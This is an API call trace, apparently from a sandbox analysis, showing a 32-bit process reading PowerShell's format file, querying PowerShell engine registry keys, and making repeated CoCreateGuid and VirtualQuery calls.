	[0162.271] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x33d42025, Data2=0xb126, Data3=0x4cee, Data4=([0]=0x9c, [1]=0xd2, [2]=0x2b, [3]=0xd7, [4]=0xc2, [5]=0xd6, [6]=0x1f, [7]=0x49))) returned 0x0
	[0162.271] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x78bd4303, Data2=0x5db7, Data3=0x43a6, Data4=([0]=0x80, [1]=0xb2, [2]=0x5f, [3]=0x13, [4]=0xa2, [5]=0xdf, [6]=0xbf, [7]=0xa6))) returned 0x0
	[0162.272] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x92dc4e4a, Data2=0xa9e6, Data3=0x40db, Data4=([0]=0xa0, [1]=0xeb, [2]=0x9, [3]=0x21, [4]=0x65, [5]=0x4d, [6]=0x2, [7]=0x91))) returned 0x0
	[0162.273] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x8ff40478, Data2=0xcb32, Data3=0x41ea, Data4=([0]=0xbe, [1]=0x3c, [2]=0x87, [3]=0xcb, [4]=0x22, [5]=0x9f, [6]=0x11, [7]=0x9e))) returned 0x0
	[0162.273] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xbee0f782, Data2=0xfc55, Data3=0x4d44, Data4=([0]=0x8d, [1]=0x3f, [2]=0x99, [3]=0xc3, [4]=0xb5, [5]=0x96, [6]=0x3f, [7]=0x1f))) returned 0x0
	[0162.273] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xa1d61be2, Data2=0x1369, Data3=0x41ab, Data4=([0]=0xaa, [1]=0x7f, [2]=0xa6, [3]=0x97, [4]=0xf7, [5]=0xa7, [6]=0x2f, [7]=0x1b))) returned 0x0
	[0162.274] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c
	[0162.274] GetLastError () returned 0x0
	[0162.274] GetFileType (hFile=0x34c) returned 0x1
	[0162.274] SetErrorMode (uMode=0x1) returned 0x1
	[0162.274] GetFileType (hFile=0x34c) returned 0x1
	[0162.275] ReadFile (in: hFile=0x34c, lpBuffer=0x31c0574, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x31c0574*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.499] GetLastError () returned 0x0
	[0162.522] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.522] GetLastError () returned 0x0
	[0162.522] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.522] GetLastError () returned 0x0
	[0162.522] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.522] GetLastError () returned 0x0
	[0162.522] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.522] GetLastError () returned 0x0
	[0162.522] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.522] GetLastError () returned 0x0
	[0162.523] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.523] GetLastError () returned 0x0
	[0162.523] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.523] GetLastError () returned 0x0
	[0162.523] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.523] GetLastError () returned 0x0
	[0162.524] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.524] GetLastError () returned 0x0
	[0162.524] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.524] GetLastError () returned 0x0
	[0162.524] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.525] GetLastError () returned 0x0
	[0162.525] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.525] GetLastError () returned 0x0
	[0162.525] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.525] GetLastError () returned 0x0
	[0162.525] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.525] GetLastError () returned 0x0
	[0162.525] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.525] GetLastError () returned 0x0
	[0162.525] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.525] GetLastError () returned 0x0
	[0162.526] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.526] GetLastError () returned 0x0
	[0162.526] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.527] GetLastError () returned 0x0
	[0162.527] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.527] GetLastError () returned 0x0
	[0162.527] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.527] GetLastError () returned 0x0
	[0162.527] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0xe67, lpOverlapped=0x0) returned 1
	[0162.527] GetLastError () returned 0x0
	[0162.527] ReadFile (in: hFile=0x34c, lpBuffer=0x2b56bb3, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b56bb3*, lpNumberOfBytesRead=0xce9b4*=0x0, lpOverlapped=0x0) returned 1
	[0162.527] GetLastError () returned 0x0
	[0162.528] ReadFile (in: hFile=0x34c, lpBuffer=0x2b57578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2b57578*, lpNumberOfBytesRead=0xce9b4*=0x0, lpOverlapped=0x0) returned 1
	[0162.528] GetLastError () returned 0x0
	[0162.817] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce938 | out: phkResult=0xce938*=0x34c) returned 0x0
	[0162.817] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce980, lpData=0x0, lpcbData=0xce97c*=0x0 | out: lpType=0xce980*=0x1, lpData=0x0, lpcbData=0xce97c*=0x56) returned 0x0
	[0162.817] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce980, lpData=0x337c48, lpcbData=0xce97c*=0x56 | out: lpType=0xce980*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce97c*=0x56) returned 0x0
	[0162.818] RegCloseKey (hKey=0x34c) returned 0x0
	[0162.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0162.818] GetLastError () returned 0x0
	[0162.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0162.818] GetLastError () returned 0x0
	[0162.819] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x5e0e16bb, Data2=0xa490, Data3=0x47e8, Data4=([0]=0xb1, [1]=0x87, [2]=0xd1, [3]=0x2, [4]=0xc8, [5]=0x52, [6]=0xa, [7]=0x7c))) returned 0x0
	[0162.819] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xaa3a0505, Data2=0x5a9e, Data3=0x4da2, Data4=([0]=0x8e, [1]=0x2b, [2]=0xdd, [3]=0x24, [4]=0xa9, [5]=0x45, [6]=0xda, [7]=0xfb))) returned 0x0
	[0162.819] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x6363e736, Data2=0x7f44, Data3=0x425a, Data4=([0]=0xbe, [1]=0x5a, [2]=0xeb, [3]=0xa9, [4]=0x94, [5]=0x26, [6]=0x81, [7]=0x3f))) returned 0x0
	[0162.819] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x9ee10e3b, Data2=0x50af, Data3=0x4367, Data4=([0]=0x91, [1]=0x4b, [2]=0xd4, [3]=0x14, [4]=0x76, [5]=0xa7, [6]=0xd2, [7]=0x81))) returned 0x0
	[0162.820] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xc9901b69, Data2=0xba97, Data3=0x455a, Data4=([0]=0x9e, [1]=0xa1, [2]=0x5c, [3]=0x98, [4]=0xb1, [5]=0xc0, [6]=0x12, [7]=0x6c))) returned 0x0
	[0162.820] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x79b61f09, Data2=0x297, Data3=0x488a, Data4=([0]=0x96, [1]=0x87, [2]=0x9, [3]=0x2f, [4]=0x29, [5]=0xde, [6]=0x56, [7]=0x53))) returned 0x0
	[0162.820] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xccc1f067, Data2=0x6821, Data3=0x4cb7, Data4=([0]=0xaa, [1]=0x6a, [2]=0x7, [3]=0xe1, [4]=0xb3, [5]=0x39, [6]=0xf3, [7]=0x84))) returned 0x0
	[0162.820] VirtualQuery (in: lpAddress=0xcd700, lpBuffer=0xce700, dwLength=0x1c | out: lpBuffer=0xce700*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.820] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x994cc8e5, Data2=0xaf1b, Data3=0x4cdc, Data4=([0]=0x9e, [1]=0xfe, [2]=0xf7, [3]=0x31, [4]=0x68, [5]=0x76, [6]=0xf0, [7]=0x64))) returned 0x0
	[0162.820] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xc981f383, Data2=0x234, Data3=0x44e1, Data4=([0]=0x8a, [1]=0xd6, [2]=0x78, [3]=0x59, [4]=0x4f, [5]=0xdb, [6]=0x41, [7]=0x88))) returned 0x0
	[0162.820] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xa9231f29, Data2=0xf9fc, Data3=0x40c1, Data4=([0]=0x8d, [1]=0x42, [2]=0xef, [3]=0xc1, [4]=0xb, [5]=0xca, [6]=0xf3, [7]=0xe3))) returned 0x0
	[0162.820] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xe57049cf, Data2=0xff81, Data3=0x4d95, Data4=([0]=0xab, [1]=0x64, [2]=0xfd, [3]=0xf1, [4]=0xae, [5]=0x18, [6]=0x69, [7]=0x52))) returned 0x0
	[0162.821] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x5ea56940, Data2=0x85aa, Data3=0x40a5, Data4=([0]=0x93, [1]=0x6c, [2]=0x9f, [3]=0x27, [4]=0x86, [5]=0x49, [6]=0x1b, [7]=0xe9))) returned 0x0
	[0162.821] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x27235ca6, Data2=0x90b, Data3=0x4d73, Data4=([0]=0xbc, [1]=0x2f, [2]=0xa0, [3]=0x26, [4]=0xcc, [5]=0xcb, [6]=0xae, [7]=0x22))) returned 0x0
	[0162.821] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x2bea8346, Data2=0x182c, Data3=0x4e79, Data4=([0]=0xb1, [1]=0xff, [2]=0x7e, [3]=0x2a, [4]=0xb6, [5]=0x86, [6]=0x2f, [7]=0x8f))) returned 0x0
	[0162.821] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x27a45e4a, Data2=0xf383, Data3=0x46da, Data4=([0]=0x9a, [1]=0xe6, [2]=0xc0, [3]=0x6d, [4]=0x12, [5]=0x9f, [6]=0xe3, [7]=0x89))) returned 0x0
	[0162.821] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x30f1b65b, Data2=0xdb4e, Data3=0x4102, Data4=([0]=0xac, [1]=0x19, [2]=0x12, [3]=0xc5, [4]=0x98, [5]=0xf, [6]=0xfa, [7]=0x94))) returned 0x0
	[0162.821] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xe8243276, Data2=0x679a, Data3=0x4f62, Data4=([0]=0x8e, [1]=0x6a, [2]=0xfe, [3]=0x8e, [4]=0xae, [5]=0x65, [6]=0xf9, [7]=0x21))) returned 0x0
	[0162.821] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x92949da3, Data2=0x4e5, Data3=0x404e, Data4=([0]=0x96, [1]=0x1c, [2]=0x89, [3]=0x1b, [4]=0xc, [5]=0x8e, [6]=0xaf, [7]=0x8b))) returned 0x0
	[0162.822] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x7200bec6, Data2=0xf2d3, Data3=0x420e, Data4=([0]=0x87, [1]=0x47, [2]=0xa1, [3]=0xf9, [4]=0x86, [5]=0x23, [6]=0x2, [7]=0xa6))) returned 0x0
	[0162.822] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.822] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.822] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.823] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xeeaf1c6a, Data2=0x4f6d, Data3=0x4188, Data4=([0]=0x93, [1]=0x52, [2]=0xdd, [3]=0x76, [4]=0xf0, [5]=0x86, [6]=0xad, [7]=0x20))) returned 0x0
	[0162.823] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x671eee3b, Data2=0x13f9, Data3=0x4ded, Data4=([0]=0xb0, [1]=0xe2, [2]=0x60, [3]=0x7b, [4]=0x2e, [5]=0x82, [6]=0xc6, [7]=0x9f))) returned 0x0
	[0162.823] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xbcdeb9b1, Data2=0x993f, Data3=0x42d5, Data4=([0]=0x97, [1]=0xcf, [2]=0xc7, [3]=0xe6, [4]=0x9d, [5]=0x29, [6]=0xc3, [7]=0x3b))) returned 0x0
	[0162.823] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xf4aceb53, Data2=0xae35, Data3=0x4323, Data4=([0]=0x8a, [1]=0x96, [2]=0x6, [3]=0x51, [4]=0x29, [5]=0xca, [6]=0x85, [7]=0xd3))) returned 0x0
	[0162.823] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xae6873e6, Data2=0x8e10, Data3=0x48bf, Data4=([0]=0x84, [1]=0xc3, [2]=0x35, [3]=0x91, [4]=0xaf, [5]=0x1d, [6]=0x92, [7]=0xc4))) returned 0x0
	[0162.823] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x13c393f4, Data2=0x4f8e, Data3=0x4021, Data4=([0]=0x96, [1]=0xa7, [2]=0x8a, [3]=0xde, [4]=0x23, [5]=0x54, [6]=0x76, [7]=0x39))) returned 0x0
	[0162.824] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x2d65642b, Data2=0xe632, Data3=0x4b42, Data4=([0]=0x80, [1]=0x59, [2]=0x24, [3]=0x8f, [4]=0x1, [5]=0x7f, [6]=0x7a, [7]=0x10))) returned 0x0
	[0162.824] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xdb9b4b63, Data2=0x38ba, Data3=0x46cb, Data4=([0]=0xaa, [1]=0x37, [2]=0xf1, [3]=0x77, [4]=0x87, [5]=0xa5, [6]=0xff, [7]=0xbc))) returned 0x0
	[0162.824] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xf9d24af2, Data2=0x5b05, Data3=0x4b36, Data4=([0]=0xa6, [1]=0xfb, [2]=0xe8, [3]=0xdf, [4]=0xbe, [5]=0xa2, [6]=0xe7, [7]=0xa8))) returned 0x0
	[0162.824] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xaac6210, Data2=0xdf3, Data3=0x474f, Data4=([0]=0xa4, [1]=0x2c, [2]=0xab, [3]=0xd9, [4]=0xef, [5]=0xa2, [6]=0x96, [7]=0x3b))) returned 0x0
	[0162.824] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xfc4bde6d, Data2=0x1e0f, Data3=0x4167, Data4=([0]=0xa6, [1]=0xbc, [2]=0x9b, [3]=0x8, [4]=0xf7, [5]=0xc2, [6]=0xcc, [7]=0x61))) returned 0x0
	[0162.825] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x6886e54c, Data2=0x259d, Data3=0x41d2, Data4=([0]=0x9c, [1]=0x35, [2]=0xc4, [3]=0xab, [4]=0x96, [5]=0x14, [6]=0xa8, [7]=0x4d))) returned 0x0
	[0162.825] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xa23305f8, Data2=0xd0a0, Data3=0x4ee6, Data4=([0]=0xba, [1]=0xb1, [2]=0xed, [3]=0x6, [4]=0x92, [5]=0x4, [6]=0xa3, [7]=0x55))) returned 0x0
	[0162.825] VirtualQuery (in: lpAddress=0xcd700, lpBuffer=0xce700, dwLength=0x1c | out: lpBuffer=0xce700*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.825] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x85c0e79a, Data2=0x43dd, Data3=0x4711, Data4=([0]=0x8a, [1]=0xd2, [2]=0x5a, [3]=0x3, [4]=0xae, [5]=0x73, [6]=0x2e, [7]=0xcc))) returned 0x0
	[0162.825] VirtualQuery (in: lpAddress=0xcd700, lpBuffer=0xce700, dwLength=0x1c | out: lpBuffer=0xce700*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.829] VirtualQuery (in: lpAddress=0xcd700, lpBuffer=0xce700, dwLength=0x1c | out: lpBuffer=0xce700*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.833] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x44245853, Data2=0xf45b, Data3=0x48b9, Data4=([0]=0x86, [1]=0xb7, [2]=0xb9, [3]=0x38, [4]=0xd5, [5]=0xdf, [6]=0x80, [7]=0x16))) returned 0x0
	[0162.833] VirtualQuery (in: lpAddress=0xcd700, lpBuffer=0xce700, dwLength=0x1c | out: lpBuffer=0xce700*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.833] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xd3e91ba4, Data2=0xb0f3, Data3=0x48da, Data4=([0]=0xb7, [1]=0x63, [2]=0x8f, [3]=0xc0, [4]=0x57, [5]=0xfd, [6]=0x50, [7]=0x22))) returned 0x0
	[0162.834] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xffedcaa6, Data2=0x9b8c, Data3=0x403e, Data4=([0]=0x94, [1]=0x5d, [2]=0xae, [3]=0xcd, [4]=0xa0, [5]=0xdc, [6]=0x5f, [7]=0x52))) returned 0x0
	[0162.834] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x6f356782, Data2=0x2d34, Data3=0x4e87, Data4=([0]=0x84, [1]=0x36, [2]=0x79, [3]=0x33, [4]=0x68, [5]=0xc3, [6]=0xb6, [7]=0x18))) returned 0x0
	[0162.834] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x4fe2f62d, Data2=0xd667, Data3=0x4854, Data4=([0]=0xa8, [1]=0x9b, [2]=0xd1, [3]=0x11, [4]=0x8a, [5]=0x8a, [6]=0x58, [7]=0x5a))) returned 0x0
	[0162.834] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x2bd530f6, Data2=0xaecf, Data3=0x4079, Data4=([0]=0x80, [1]=0x60, [2]=0x39, [3]=0x49, [4]=0x41, [5]=0x62, [6]=0x23, [7]=0xb9))) returned 0x0
	[0162.834] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x62bec057, Data2=0x69e6, Data3=0x4c7e, Data4=([0]=0xb2, [1]=0x52, [2]=0x13, [3]=0x9b, [4]=0x37, [5]=0x92, [6]=0x90, [7]=0x3))) returned 0x0
	[0162.834] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x2d2a9731, Data2=0xd2e8, Data3=0x4539, Data4=([0]=0x91, [1]=0xc4, [2]=0x4b, [3]=0x10, [4]=0xbd, [5]=0xa2, [6]=0xb4, [7]=0x7a))) returned 0x0
	[0162.835] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.835] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x23904dfb, Data2=0xa263, Data3=0x4d68, Data4=([0]=0x98, [1]=0xdb, [2]=0xf2, [3]=0x71, [4]=0x7a, [5]=0x52, [6]=0x55, [7]=0xff))) returned 0x0
	[0162.835] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xa613a80d, Data2=0x972d, Data3=0x4d7d, Data4=([0]=0x9e, [1]=0x63, [2]=0x11, [3]=0x26, [4]=0x3d, [5]=0x7f, [6]=0xbe, [7]=0x9d))) returned 0x0
	[0162.835] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x7fa6147b, Data2=0x34a0, Data3=0x4ce1, Data4=([0]=0x9e, [1]=0x91, [2]=0x64, [3]=0xcf, [4]=0xdb, [5]=0x47, [6]=0xaa, [7]=0x9b))) returned 0x0
	[0162.835] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x2913a31b, Data2=0x726b, Data3=0x465a, Data4=([0]=0xa7, [1]=0xa3, [2]=0xbc, [3]=0xc9, [4]=0xa0, [5]=0x45, [6]=0x6c, [7]=0x70))) returned 0x0
	[0162.835] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x292b471f, Data2=0xb37e, Data3=0x4b16, Data4=([0]=0x80, [1]=0x5, [2]=0xf6, [3]=0x6f, [4]=0x99, [5]=0xdc, [6]=0x68, [7]=0x4e))) returned 0x0
	[0162.836] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
